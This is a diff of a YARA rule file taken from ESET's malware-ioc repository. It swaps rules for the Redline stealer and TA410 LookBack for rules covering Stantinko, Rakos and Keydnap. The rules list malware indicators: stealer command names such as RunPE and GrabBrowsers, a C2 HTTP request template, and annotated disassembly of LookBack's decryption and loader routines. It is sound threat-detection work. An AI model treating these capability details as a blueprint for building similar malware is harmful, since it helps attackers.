+		pe.exports( "CheckDLLStatus" ) and pe.exports ( "GetPluginData" ) and pe.exports ( "InitializePlugin" ) and pe.exports ( "IsReleased" ) and pe.exports ( "ReleaseDLL" )
 }
-rule ESET_Cw_Windows_Redline_Panel_Status_Message_Strings : FILE
+
+rule ESET_Beds_Dropper
 {
 	meta:
-		description = "Matches error/success messages in Redline panel"
-		author = "ESET Research"
-		id = "70bdff10-9c86-57e3-b839-e86173a44855"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "47ccab59-253f-55d4-b38a-4441802626fc"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L115-L142"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L53-L67"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "c60fabc81967b083be72ff564af744ab60441de5d563ea6d88d873c0a99bfbdd"
+		logic_hash = "4b5d121e182e3fddd766a7a1227c5de273995e9336156e7a6e8a17faad681bea"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 1
-
-	strings:
-		$ = "All Browsers are empty"
-		$ = "Client [{0}:{1}:{2}] completed task with {3} ID."
-		$ = "A List of logs cleared"
-		$ = "Browsers not found"
-		$ = "Browsers is empty"
-		$ = "Done. Check your build file"
-		$ = "You must to enable assembly info or certificate in settings"
-		$ = "Duplicate log from "
-		$ = "Password list is empty"
-		$ = "Cookie list is empty"
-		$ = "FTPs not found"
-		$ = "Files not found"
+		tags = ""
+		Author = "Frédéric Vachon"
+		Description = "BEDS dropper"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		pe.imphash( ) == "a7ead4ef90d9981e25728e824a1ba3ef"
 }
-rule ESET_Cw_Windows_Redline_Panel_Commands : FILE
+rule ESET_Facebook_Bot : FILE
 {
 	meta:
-		description = "Matches commands and functionalities in Redline panel"
-		author = "ESET Research"
-		id = "b479dc47-53a0-5ead-a4c3-bcdfcaf82ef8"
-		date = "2022-10-11"
-		modified = "2024-11-12"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "643b137f-af79-584c-8266-f2335a79f1ba"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L144-L172"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L69-L100"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
-		logic_hash = "724516101264aa89259e847e4703d4eb993f330f82bd2df2433176b11d0c8974"
+		logic_hash = "8ea779f90fa6080398403e3e6f9d342360c35e93c756ed43cb699f090106504e"
 		score = 75
 		quality = 55
 		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = 2
+		Author = "Frédéric Vachon"
+		Description = "Stantinko's Facebook bot"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$cmd0 = "Download"
-		$cmd1 = "RunPE"
-		$cmd2 = "DownloadAndEx"
-		$cmd3 = "OpenLink"
-		$cmd4 = "Cmd"
-		$action0 = "GrabBrowsers"
-		$action1 = "GrabFiles"
-		$action2 = "GrabImClients"
-		$action3 = "AntiDuplicate"
-		$action4 = "grabBrowsers"
-		$action5 = "grabFiles"
-		$action6 = "grabImClients"
-		$action7 = "antiDuplicate"
+		$s1 = "m_upload_pic&return_uri=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
+		$s2 = "D:\\work\\brut\\cms\\facebook\\facebookbot\\Release\\facebookbot.pdb" fullword ascii
+		$s3 = "https%3A%2F%2Fm.facebook.com%2Fcomment%2Freplies%2F%3Fctoken%3D" fullword ascii
+		$s4 = "reg_fb_gate=https%3A%2F%2Fm.facebook.com%2Freg" fullword ascii
+		$s5 = "reg_fb_ref=https%3A%2F%2Fm.facebook.com%2Freg%2F" fullword ascii
+		$s6 = "&return_uri_error=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
+		$x1 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword ascii
+		$x2 = "registration@facebookmail.com" fullword ascii
+		$x3 = "https://m.facebook.com/profile.php?mds=" fullword ascii
+		$x4 = "https://upload.facebook.com/_mupload_/composer/?profile&domain=" fullword ascii
+		$x5 = "http://staticxx.facebook.com/connect/xd_arbiter.php?version=42#cb=ff43b202c" fullword ascii
+		$x6 = "https://upload.facebook.com/_mupload_/photo/x/saveunpublished/" fullword ascii
+		$x7 = "m.facebook.com&ref=m_upload_pic&waterfall_source=" fullword ascii
+		$x8 = "payload.commentID" fullword ascii
+		$x9 = "profile.login" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $cmd* ) and 4 of ( $action* )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $s* ) or 3 of ( $x* ) ) ) or ( all of them )
 }
-rule ESET_Apt_Windows_TA410_Tendyron_Dropper
+rule ESET_Pds_Plugins : FILE
 {
 	meta:
-		description = "TA410 Tendyron Dropper"
-		author = "ESET Research"
-		id = "8d1e16d9-b5c2-5427-a0b4-7dd00a9df5ec"
-		date = "2020-12-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "dfa75db5-f21c-5b5e-84ba-3bfdcc3efdcd"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L34-L53"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L102-L130"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "45f7300a4b85624ad3fda5c73a24f53f53cb7990def4d84e04dcd8e5747f4f2e"
+		logic_hash = "26bbd380b72fb45206178639d67c8737b9984b140ba1048432949e159946c847"
 		score = 75
 		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = "FILE"
+		Author = "Frédéric Vachon"
+		Description = "Stantinko PDS' plugins"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = "Global\\{F473B3BE-08EE-4710-A727-9E248F804F4A}" wide
-		$s2 = "Global\\8D32CCB321B2" wide
-		$s3 = "Global\\E4FE94F75490" wide
-		$s4 = "Program Files (x86)\\Internet Explorer\\iexplore.exe" wide
-		$s5 = "\\RPC Control\\OLE" wide
-		$s6 = "ALPC Port" wide
+		$s1 = "std::_Vector_val<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
+		$s2 = "std::_Vector_val<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
+		$s3 = "std::vector<CHTTPHeader *,std::allocator<CHTTPHeader *> >" fullword ascii
+		$s4 = "std::vector<CHTTPPostItem *,std::allocator<CHTTPPostItem *> >" fullword ascii
+		$s5 = "CHTTPHeaderManager" fullword ascii
+		$s6 = "CHTTPPostItemManager *" fullword ascii
+		$s7 = "CHTTPHeaderManager *" fullword ascii
+		$s8 = "CHTTPPostItemManager" fullword ascii
+		$s9 = "CHTTPHeader" fullword ascii
+		$s10 = "CHTTPPostItem" fullword ascii
+		$s11 = "std::vector<CCookie *,std::allocator<CCookie *> >" fullword ascii
+		$s12 = "std::_Vector_val<CCookie *,std::allocator<CCookie *> >" fullword ascii
+		$s13 = "CCookieManager *" fullword ascii
 
 	condition:
-		int16 ( 0 ) == 0x5A4D and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $s* ) ) )
 }
-rule ESET_Apt_Windows_TA410_Tendyron_Installer
+rule ESET_Stantinko_Pdb
 {
 	meta:
-		description = "TA410 Tendyron Installer"
-		author = "ESET Research"
-		id = "95ccad1c-99fb-5d38-aec0-650db3e06b35"
-		date = "2020-12-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "24694e53-b89e-5cd3-ad53-e738bbd7d69d"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L55-L73"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L132-L148"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "9c3afb924747614f27c31cf2c3d98f4932a9d11597a3ac94263bf93be02801da"
+		logic_hash = "902c0ee086ce1a8def831d2f30c868165198c6c304faac3a93116a524f8e2fbf"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		Author = "Frédéric Vachon"
+		Description = "Stantinko malware family PDB path"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = "Tendyron" wide
-		$s2 = "OnKeyToken_KEB.dll" wide
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s4 = "Global\\8D32CCB321B2"
-		$s5 = "\\RTFExploit\\"
+		$s1 = "D:\\work\\service\\service\\" ascii
 
 	condition:
-		int16 ( 0 ) == 0x5A4D and 3 of them
+		all of them
 }
-rule ESET_Apt_Windows_TA410_Tendyron_Downloader
+rule ESET_Stantinko_Droppers : FILE
 {
 	meta:
-		description = "TA410 Tendyron Downloader"
-		author = "ESET Research"
-		id = "afd8a2a7-8d58-5a96-b9e0-6f8b859e83c5"
-		date = "2020-12-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "fe2e6987-929a-59e3-a9ec-01a9f55fe589"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L75-L107"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L150-L170"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "16030a78ae9af8783f5913644294ceff861c8264ead8ca99435032be6d7949ef"
+		logic_hash = "c56fc85834a3e1bb1c14da37fb509c7de3009bf81d52800fe0093dc489f6deaa"
 		score = 75
 		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = "FILE"
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko droppers"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$chunk_1 = {
-            8A 10
-            80 F2 5C
-            80 C2 5C
-            88 10
-            40
-            83 E9 01
-            75 ??
-        }
-		$s1 = "startModule" fullword
+		$s1 = {55 8B EC 83 EC 08 53 56 BE 80 F4 45 00 57 81 EE 80 0E 41 00 56 E8 6D 23 00 00 56 8B D8 68 80 0E 41 00 53 89 5D F8 E8 65 73 00 00 8B 0D FC F5 45}
+		$s2 = {7E 5E 7F 8C 08 46 00 00 AB 57 1A BB 91 5C 00 00 FA CC FD 76 90 3A 00 00}
 
 	condition:
-		int16 ( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 1 of them
 }
-rule ESET_Apt_Windows_TA410_X4_Strings
+
+rule ESET_Stantinko_D3D
 {
 	meta:
-		description = "Matches various strings found in TA410 X4"
-		author = "ESET Research"
-		id = "e6af4516-8b79-5182-8571-7dd530632ddc"
-		date = "2020-10-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "6652e55c-96a0-55a7-9941-7f32bbf984e5"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L109-L125"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L172-L187"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "d4b2321a6d0eb0ca8d7c47596af2a45c22b3aef15d1832d64d6588a62cab312a"
+		logic_hash = "4e8da3f11df15e4aa469db62961ae390c4c4df2a5335eec0bdab19b14cc8343d"
 		score = 75
-		quality = 74
+		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$s1 = "[X]InLoadSC" ascii wide nocase
-		$s3 = "MachineKeys\\Log\\rsa.txt" ascii wide nocase
-		$s4 = "MachineKeys\\Log\\output.log" ascii wide nocase
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko d3dadapter component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	condition:
-		any of them
+		pe.exports( "EntryPoint" ) and pe.exports ( "ServiceMain" ) and pe.imports ( "WININET.DLL" , "HttpAddRequestHeadersA" )
 }
-rule ESET_Apt_Windows_TA410_X4_Hash_Values : FILE
+rule ESET_Stantinko_Ihctrl32
 {
 	meta:
-		description = "Matches X4 hash function found in TA410 X4"
-		author = "ESET Research"
-		id = "859bb977-82d0-5314-b1a8-fb3bb06a1b28"
-		date = "2020-10-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "e8ab9f78-f438-5d9b-8407-e6c7e241da2c"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L127-L149"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L189-L209"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "bcf3891ff888ca99af9aa0e239b29241ae819022607fb829c5731267add308ea"
+		logic_hash = "1829e08fb2289f738d0e75ad9977169e9a94379da764b1766f23fa47e8bc2543"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko ihctrl32 component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = {D1 10 76 C2 B6 03}
-		$s2 = {71 3E A8 0D}
-		$s3 = {DC 78 94 0E}
-		$s4 = {40 0D E7 D6 06}
-		$s5 = {83 BB FD E8 06}
-		$s6 = {92 9D 9B FF EC 03}
-		$s7 = {DD 0E FC FA F5 03}
-		$s8 = {15 60 1E FB F5 03}
+		$s1 = "ihctrl32.dll"
+		$s2 = "win32_hlp"
+		$s3 = "Ihctrl32Main"
+		$s4 = "I%citi%c%size%s%c%ci%s"
+		$s5 = "Global\\Intel_hctrl32"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		2 of them
 }
-rule ESET_Apt_Windows_TA410_X4_Hash_Fct : FILE
+rule ESET_Stantinko_Wsaudio
 {
 	meta:
-		description = "Matches X4 hash function found in TA410 X4"
-		author = "ESET Research"
-		id = "5ca435a4-7c6e-594d-8c4d-d577735884e6"
-		date = "2020-10-09"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "623f4ac7-03ec-52df-b7bf-0a2055453c52"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L151-L187"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L211-L233"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3b2d44cb7685a99e9aeb08f886f6876d43ee99d1e52e40705c3fa97ce3bfa9a0"
+		logic_hash = "45d92f1475f316ba50a9a4a3dd519d1186ed16c68bd2debe326736a1e3154562"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko wsaudio component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$chunk_1 = {
-            0F B6 01
-            84 C0
-            74 ??
-            48 69 D2 83 00 00 00
-            48 0F BE C0
-            48 03 D0
-            48 FF C1
-            E9 ?? ?? ?? ??
-        }
+		$s1 = "GetInterface"
+		$s2 = "wsaudio.dll"
+		$s3 = "Global\\Wsaudio_Initialize"
+		$s4 = "SOFTWARE\\Classes\\%s.FieldListCtrl.1\\"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		2 of them
 }
-rule ESET_Apt_Windows_TA410_Lookback_Decryption : FILE
+rule ESET_Stantinko_Ghstore
 {
 	meta:
-		description = "Matches encryption/decryption function used by LookBack."
-		author = "ESET Research"
-		id = "91947c6b-f357-5cf8-8522-4dcd517d01cb"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "ef9f0c27-35ea-5dd5-925f-09b6e043569d"
+		date = "2017-07-17"
+		modified = "2017-07-20"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L189-L254"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L235-L255"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "016dca6be654fcd193acc481e6a998efbb77e7ebd09b26614422be1136dd02c0"
+		logic_hash = "e5628d6ffb2d3684264b3a88c4d7b5d2ce8983aa22badf5839ccb8ba2e3ef2d4"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
+		tags = ""
+		Author = "Marc-Etienne M.Léveillé"
+		Description = "Stantinko ghstore component"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$initialize = {
-            8B C6           //mov eax, esi
-            99              //cdq
-            83 E2 03        //and edx, 3
-            03 C2           //add eax, edx
-            C1 F8 02        //sar eax, 2
-            8A C8           //mov cl, al
-            02 C0           //add al, al
-            02 C8           //add cl, al
-            88 4C 34 10         //mov byte ptr [esp + esi + 0x10], cl
-            46              //inc esi
-            81 FE 00 01 00 00       //cmp esi, 0x100
-            72 ??
-        }
-		$generate = {
-            8A 94 1C 10 01 ?? ??    //mov dl, byte ptr [esp + ebx + 0x110]
-            8D 8C 24 10 01 ?? ??    //lea ecx, [esp + 0x110]
-            0F B6 C3        //movzx eax, bl
-            0F B6 44 04 10      //movzx eax, byte ptr [esp + eax + 0x10]
-            32 C2           //xor al, dl
-            02 F0           //add dh, al
-            0F B6 C6        //movzx eax, dh
-            03 C8           //add ecx, eax
-            0F B6 01        //movzx eax, byte ptr [ecx]
-            88 84 1C 10 01 ?? ??    //mov byte ptr [esp + ebx + 0x110], al
-            43              //inc ebx
-            88 11           //mov byte ptr [ecx], dl
-            81 FB 00 06 00 00       //cmp ebx, 0x600
-            72 ??           //jb 0x10025930
-        }
-		$decrypt = {
-            0F B6 C6        //movzx eax, dh
-            8D 8C 24 10 01 ?? ??    //lea ecx, [esp + 0x110]
-            03 C8           //add ecx, eax
-            8A 19           //mov bl, byte ptr [ecx]
-            8A C3           //mov al, bl
-            02 C6           //add al, dh
-            FE C6           //inc dh
-            02 F8           //add bh, al
-            0F B6 C7        //movzx eax, bh
-            8A 94 04 10 01 ?? ??    //mov dl, byte ptr [esp + eax + 0x110]
-            88 9C 04 10 01 ?? ??    //mov byte ptr [esp + eax + 0x110], bl
-            88 11           //mov byte ptr [ecx], dl
-            0F B6 C2        //movzx eax, dl
-            0F B6 CB        //movzx ecx, bl
-            33 C8           //xor ecx, eax
-            8A 84 0C 10 01 ?? ??    //mov al, byte ptr [esp + ecx + 0x110]
-            30 04 2E        //xor byte ptr [esi + ebp], al
-            46              //inc esi
-            3B F7           //cmp esi, edi
-            7C ??           //jl 0x10025980
-        }
+		$s1 = "G%cost%sSt%c%s%s%ce%sr" wide
+		$s2 = "%cho%ct%sS%sa%c%s%crve%c" wide
+		$s3 = "Par%c%ce%c%c%s" wide
+		$s4 = "S%c%curity%c%s%c%s" wide
+		$s5 = "Sys%c%s%c%c%su%c%s%clS%c%s%serv%s%ces" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		3 of them
 }
-rule ESET_Apt_Windows_TA410_Lookback_Loader : FILE
+rule ESET_Linux_Rakos
 {
 	meta:
-		description = "Matches the modified function in LookBack libcurl loader."
-		author = "ESET Research"
-		id = "d0aac4f6-f72f-5adf-8f8f-9251bad70131"
-		date = "2021-10-12"
-		modified = "2022-04-27"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L256-L309"
+		description = "Linux/Rakos.A executable"
+		author = "Peter Kálnai"
+		id = "3c15401a-22c1-59e2-a979-1f9a6a990ae0"
+		date = "2016-12-13"
+		modified = "2016-12-19"
+		reference = "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/rakos/rakos.yar#L33-L53"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "98390dd664227ad747e5572771d12e7ebd2475d26db27e85508347ac6f44f3bf"
+		logic_hash = "79a02ada56bf75c5f178b58822eb905977cace3483453ea8cf4dfc32f6b6c30d"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
+		tags = ""
 		version = "1"
+		contact = "threatintel@eset.com"
+		license = "BSD 2-Clause"
 
 	strings:
-		$chunk_1 = {
-            FF 15 ?? ?? ?? ??      //call dword ptr [0x100530e0]
-            6A 40          //push 0x40
-            68 00 10 00 00     //push 0x1000
-            68 F0 04 00 00     //push 0x4f0
-            6A 00          //push 0
-            FF 15 ?? ?? ?? ??      //call dword ptr [0x100530d4]
-            8B E8          //mov ebp, eax
-            B9 3C 01 00 00     //mov ecx, 0x13c
-            BE 60 30 06 10     //mov esi, 0x10063060
-            8B FD          //mov edi, ebp
-            68 F0 04 00 00     //push 0x4f0
-            F3 A5          //rep movsd dword ptr es:[edi], dword ptr [esi]
-            55             //push ebp
-            E8 ?? ?? ?? ??     //call 0x100258d0
-            8B 0D ?? ?? ?? ??      //mov ecx, dword ptr [0x100530e4]
-            A1 ?? ?? ?? ??     //mov eax, dword ptr [0x100530c8]
-            68 6C 02 00 00     //push 0x26c
-            89 4C 24 ??        //mov dword ptr [esp + 0x1c], ecx
-            89 44 24 ??        //mov dword ptr [esp + 0x20], eax
-            FF 15 ?? ?? ?? ??      //call dword ptr [0x10063038]
-            8B D8          //mov ebx, eax
-            B9 9B 00 00 00     //mov ecx, 0x9b
-            BE 50 35 06 10     //mov esi, 0x10063550
-            8B FB          //mov edi, ebx
-            68 6C 02 00 00      //push 0x26c
-            F3 A5          //rep movsd dword ptr es:[edi], dword ptr [esi]
-            53             //push ebx
-            E8 ?? ?? ?? ??     //call 0x100258d0
-            83 C4 14           //add esp, 0x14
-            8D 44 24 ??        //lea eax, [esp + 0x10]
-            50             //push eax
-            53             //push ebx
-            8D 44 24 ??        //lea eax, [esp + 0x3c]
-            50             //push eax
-            A1 ?? ?? ?? ??     //mov eax, dword ptr [0x10063058]
-            FF 74 24 ??        //push dword ptr [esp + 0x28]
-            03 C5          //add eax, ebp
-            FF D0          //call eax
-        }
+		$ = "upgrade/vars.yaml"
+		$ = "MUTTER"
+		$ = "/tmp/.javaxxx"
+		$ = "uckmydi"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		3 of them
 }
-
-rule ESET_Apt_Windows_TA410_Lookback_Strings : FILE
+rule ESET_Keydnap_Downloader
 {
 	meta:
-		description = "Matches multiple strings and export names in TA410 LookBack."
-		author = "ESET Research"
-		id = "b693c468-5abf-579d-bc03-67f67339feb9"
-		date = "2021-10-12"
-		modified = "2022-04-27"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L311-L331"
+		description = "OSX/Keydnap Downloader"
+		author = "Marc-Etienne M.Léveillé"
+		id = "2b21007a-b143-5538-8777-ba35448d00aa"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L33-L49"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "d17ed604e3691c20fe489f95197b7b802ec951ed13d538fa6643449485b326b2"
+		logic_hash = "71c8885193a92fa9c71055c37e629a54d50070cf6820b9216a824ecc4db2ce3c"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
+		tags = ""
 		version = "1"
 
 	strings:
-		$s1 = "SodomMainFree" ascii wide
-		$s2 = "SodomMainInit" ascii wide
-		$s3 = "SodomNormal.bin" ascii wide
-		$s4 = "SodomHttp.bin" ascii wide
-		$s5 = "sodom.ini" ascii wide
-		$s6 = "SodomMainProc" ascii wide
+		$ = "icloudsyncd"
+		$ = "killall Terminal"
+		$ = "open %s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of them or pe.exports ( "SodomBodyLoad" ) or pe.exports ( "SodomBodyLoadTest" ) )
+		2 of them
 }
-rule ESET_Apt_Windows_TA410_Lookback_HTTP : FILE
+rule ESET_Keydnap_Backdoor_Packer
 {
 	meta:
-		description = "Matches LookBack's hardcoded HTTP request"
-		author = "ESET Research"
-		id = "ca4ee437-5ac9-5715-90fb-e0e74a817bb5"
-		date = "2021-10-12"
-		modified = "2022-04-27"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L333-L349"
+		description = "OSX/Keydnap packed backdoor"
+		author = "Marc-Etienne M.Léveillé"
+		id = "f29ad5af-bc86-5764-9451-5a8363788c4e"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L51-L67"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "0e777f56136cd11d62abdf4f120410d5fe9cd522cfc06afbf085414a96279bf7"
+		logic_hash = "b1740bf38376be81d3b42306c2ce81f578c0b5c9db804f063836bf98f57ed147"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
+		tags = ""
 		version = "1"
 
 	strings:
-		$s1 = "POST http://%s/status.php?r=%d%d HTTP/1.1\x0d\nAccept: text/html, application/xhtml+xml, */*\x0d\nAccept-Language: en-us\x0d\nUser-Agent: %s\x0d\nContent-Type: application/x-www-form-urlencoded\x0d\nAccept-Encoding: gzip, deflate\x0d\nHost: %s\x0d\nContent-Length: %d\x0d\nConnection: Keep-Alive\x0d\nCache-Control: no-cache\x0d\n\x0d\n" ascii wide
-		$s2 = "id=1&op=report&status="
+		$upx_string = "This file is packed with the UPX"
+		$packer_magic = "ASS7"
+		$upx_magic = "UPX!"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		$upx_string and $packer_magic and not $upx_magic
 }
-rule ESET_Apt_Windows_TA410_Lookback_Magic : FILE
+rule ESET_Keydnap_Backdoor
 {
